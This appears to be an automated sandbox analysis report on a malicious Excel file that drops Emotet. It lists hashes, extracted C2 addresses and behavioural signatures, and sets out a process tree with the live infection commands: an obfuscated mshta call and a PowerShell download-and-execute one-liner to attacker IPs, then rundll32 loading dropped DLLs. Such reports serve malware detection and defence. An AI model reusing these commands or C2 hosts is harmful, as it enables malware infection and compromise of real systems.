Analysis
-
max time kernel
134s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
18-01-2022 13:14
Behavioral task
behavioral1
Sample
941152862708266.xls
Resource
win7-en-20211208
General
-
Target
941152862708266.xls
-
Size
128KB
-
MD5
d0efc7a0b8673689b738de5d3d155e6d
-
SHA1
66beb67d482a5de21d0a614abed203a4342158e8
-
SHA256
554def5c6fb4917a17fb5f951fc799471eb7520dd970a47d62ad565642b281d6
-
SHA512
26ae37022b3063230afe9ea64d459176f8256bd07152a04a25d7f729346a7a28c6a5ea3c313ef2ffdddc7a0e6bdb1dc686fabb25fad67e4b68a5b1fc6f99202a
Malware Config
Extracted
http://0xb907d607/cc.html
Extracted
http://185.7.214.7/PP91.PNG
Extracted
emotet
Epoch4
131.100.24.231:80
209.59.138.75:7080
103.8.26.103:8080
51.38.71.0:443
212.237.17.99:8080
79.172.212.216:8080
207.38.84.195:8080
104.168.155.129:8080
178.79.147.66:8080
46.55.222.11:443
103.8.26.102:8080
192.254.71.210:443
45.176.232.124:443
203.114.109.124:443
51.68.175.8:8080
58.227.42.236:80
45.142.114.231:8080
217.182.143.207:443
178.63.25.185:443
45.118.115.99:8080
103.75.201.2:443
104.251.214.46:8080
158.69.222.101:443
81.0.236.90:443
45.118.135.203:7080
176.104.106.96:8080
212.237.56.116:7080
216.158.226.206:443
173.212.193.249:8080
50.116.54.215:443
138.185.72.26:8080
41.76.108.46:8080
212.237.5.209:443
107.182.225.142:8080
195.154.133.20:443
162.214.50.39:7080
110.232.117.186:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3864 1948 cmd.exe 50 -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 600 created 3504 600 WerFault.exe 59 -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
flow pid Process 17 3504 mshta.exe 18 4024 powershell.exe 22 4024 powershell.exe 24 4024 powershell.exe 33 1188 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 4 IoCs
pid Process 3168 rundll32.exe 4028 rundll32.exe 2492 rundll32.exe 1188 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Nnccvqhaia\yscinaa.yxu rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2184 3504 WerFault.exe 59 -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1948 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4024 powershell.exe 4024 powershell.exe 2184 WerFault.exe 2184 WerFault.exe 1188 rundll32.exe 1188 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4024 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1948 wrote to memory of 3864 1948 EXCEL.EXE 57 PID 1948 wrote to memory of 3864 1948 EXCEL.EXE 57 PID 3864 wrote to memory of 3504 3864 cmd.exe 59 PID 3864 wrote to memory of 3504 3864 cmd.exe 59 PID 3504 wrote to memory of 4024 3504 mshta.exe 62 PID 3504 wrote to memory of 4024 3504 mshta.exe 62 PID 600 wrote to memory of 3504 600 WerFault.exe 59 PID 600 wrote to memory of 3504 600 WerFault.exe 59 PID 4024 wrote to memory of 2284 4024 powershell.exe 65 PID 4024 wrote to memory of 2284 4024 powershell.exe 65 PID 2284 wrote to memory of 3168 2284 cmd.exe 66 PID 2284 wrote to memory of 3168 2284 cmd.exe 66 PID 2284 wrote to memory of 3168 2284 cmd.exe 66 PID 3168 wrote to memory of 4028 3168 rundll32.exe 67 PID 3168 wrote to memory of 4028 3168 rundll32.exe 67 PID 3168 wrote to memory of 4028 3168 rundll32.exe 67 PID 4028 wrote to memory of 2492 4028 rundll32.exe 69 PID 4028 wrote to memory of 2492 4028 rundll32.exe 69 PID 4028 wrote to memory of 2492 4028 rundll32.exe 69 PID 2492 wrote to memory of 1188 2492 rundll32.exe 70 PID 2492 wrote to memory of 1188 2492 rundll32.exe 70 PID 2492 wrote to memory of 1188 2492 rundll32.exe 70
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\941152862708266.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/cc.html3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nnccvqhaia\yscinaa.yxu",gXtpfpwmJobpud8⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Nnccvqhaia\yscinaa.yxu",DllRegisterServer9⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1188
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3504 -s 17204⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2184
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 200 -p 3504 -ip 35041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:600